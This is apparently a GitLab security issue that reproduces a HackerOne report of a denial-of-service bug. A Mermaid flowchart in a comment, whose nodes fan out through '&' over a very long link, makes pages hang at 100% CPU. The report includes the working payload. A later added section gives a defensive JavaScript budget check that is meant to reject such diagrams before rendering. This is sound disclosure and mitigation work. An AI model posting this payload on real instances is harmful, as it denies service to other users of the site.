
DOS via Flowchart TB Mermaid

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2137421 by toukakirishima on 2023-09-06, assigned to @ottilia_westerlund:


Report

Summary

I found a DoS vulnerability when adding a comment with a Flowchart TB Mermaid diagram. As an attacker, I can cause a DoS in any section with comments (Issues, Merge requests, Milestones, Snippets, Wiki pages, Markdown documents inside repositories, Epics). The page takes a while to load and uses 100% CPU.

My specification:
RAM: 40 GB
CPU: 12 CPUs 3.6 GHz AMD Ryzen 5 2600X
Browser: Mozilla Firefox & Google Chrome (Latest Version)

Steps to reproduce
  1. Create a comment with a Flowchart TB Mermaid diagram (example on an Issue)

Payload:

flowchart TB  
    A & A & A & A & A & A & A & A ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------->  C & D & E & F & G & H & I & J & K & L & M & N & O & P & Q & R & S & T & U & V & W & X & Y & Z

flowchart TB  
    A & A & A & A & A & A & A & A ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------->  C & D & E & F & G & H & I & J & K & L & M & N & O & P & Q & R & S & T & U & V & W & X & Y & Z

flowchart TB  
    A & A & A & A & A & A & A & A ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------->  C & D & E & F & G & H & I & J & K & L & M & N & O & P & Q & R & S & T & U & V & W & X & Y & Z  

image.png

  2. Reload the page. The page will take a very long time to load.

image.png

POC

bandicam_2023-09-06_14-54-12-196.mp4

Output of checks

This bug happens on GitLab.com

Impact

An attacker can cause a DoS in any section with comments (Issues, Merge requests, Milestones, Snippets, Wiki pages, Markdown documents inside repositories, Epics).
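The payload above is expensive because of two Mermaid flowchart features combined: the `&` operator links every node on the left of a link to every node on the right (8 sources and 24 targets give 192 edges per line), and extra dashes in a link request a longer edge, so each of those edges also spans many layout ranks. The following is an added example, not GitLab's or Mermaid's code, of a pre-render "budget" check that estimates this cost from the source text and refuses to hand an over-budget diagram to the renderer. The function names, the thresholds in DEFAULT_BUDGET, and the dash count used in STRESS_SAMPLE are assumptions; the samples are constructed for the example.

```javascript
// Added example, not GitLab's or Mermaid's code: a pre-render budget check for
// flowchart sources. Names and thresholds are assumptions.

// Matches one link line "<lhs> <link> <rhs>". The link is a run of at least two
// dash/dot/equals characters with an optional arrowhead: "-->", "---", "-.->",
// "==>" or the very long "------...-->" from the report. Edge labels
// ("-- text -->", "-->|text|") are not handled; this is a small recognizer.
const LINK_RE = /^(.+?)\s*([-=.]{2,}>?)\s*(.+?)$/;

// Illustrative limits; a real deployment would tune them from measured render times.
const DEFAULT_BUDGET = { maxEdges: 100, maxLinkLength: 20, maxWeightedEdges: 1000 };

// "A & A & A" -> ["A", "A", "A"]. Mermaid's "&" links every node on the left to
// every node on the right, so an n-by-m line costs n*m edges.
function splitNodeGroup(text) {
  return text.split('&').map(s => s.trim()).filter(Boolean);
}

// Sums the layout cost of a flowchart's links without rendering. Extra dashes ask
// Mermaid for a longer edge (more layout ranks), so the dash count is the weight.
function analyzeFlowchart(source) {
  const stats = { edges: 0, maxLinkLength: 0, weightedEdges: 0 };
  for (const raw of source.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('%%') || /^(flowchart|graph)\b/.test(line)) continue;
    const m = LINK_RE.exec(line);
    if (!m) continue; // node declarations, subgraphs, styles: no edge cost
    const fanOut = splitNodeGroup(m[1]).length * splitNodeGroup(m[3]).length;
    const linkLength = m[2].replace(/[^-=.]/g, '').length;
    stats.edges += fanOut;
    stats.weightedEdges += fanOut * linkLength;
    stats.maxLinkLength = Math.max(stats.maxLinkLength, linkLength);
  }
  return stats;
}

// Returns { ok, reasons, stats }; the caller renders only when ok is true.
function checkFlowchartBudget(source, budget = DEFAULT_BUDGET) {
  const stats = analyzeFlowchart(source);
  const reasons = [];
  if (stats.edges > budget.maxEdges)
    reasons.push(`too many edges: ${stats.edges} > ${budget.maxEdges}`);
  if (stats.maxLinkLength > budget.maxLinkLength)
    reasons.push(`link too long: ${stats.maxLinkLength} > ${budget.maxLinkLength}`);
  if (stats.weightedEdges > budget.maxWeightedEdges)
    reasons.push(`weighted edge cost: ${stats.weightedEdges} > ${budget.maxWeightedEdges}`);
  return { ok: reasons.length === 0, reasons, stats };
}

// Wraps the real renderer (for example a function that calls mermaid.render):
// the expensive call only happens when the source is within budget.
function guardedRender(source, render, budget = DEFAULT_BUDGET) {
  const verdict = checkFlowchartBudget(source, budget);
  if (!verdict.ok) return { rendered: false, error: verdict.reasons.join('; ') };
  return { rendered: true, output: render(source) };
}

// Constructed samples. STRESS_SAMPLE mirrors the shape of the report's payload
// (8 identical sources, 24 targets, one very long link); the 300-dash length is
// an assumption, not copied from the report.
const BENIGN_SAMPLE = 'flowchart TB\n    A --> B\n    B --> C\n';
const STRESS_SAMPLE =
  'flowchart TB\n    ' + Array(8).fill('A').join(' & ') + ' ' +
  '-'.repeat(300) + '> ' + 'CDEFGHIJKLMNOPQRSTUVWXYZ'.split('').join(' & ');

console.log(checkFlowchartBudget(BENIGN_SAMPLE).ok);       // true
console.log(checkFlowchartBudget(STRESS_SAMPLE).reasons);  // three limits exceeded
```

The check runs on the untrusted Markdown before any DOM or layout work, so a rejected diagram costs a regex pass per line rather than a graph layout. Applying it per diagram also covers a comment that stacks several diagrams, as the report's payload does, since each one is judged on its own cost.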

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: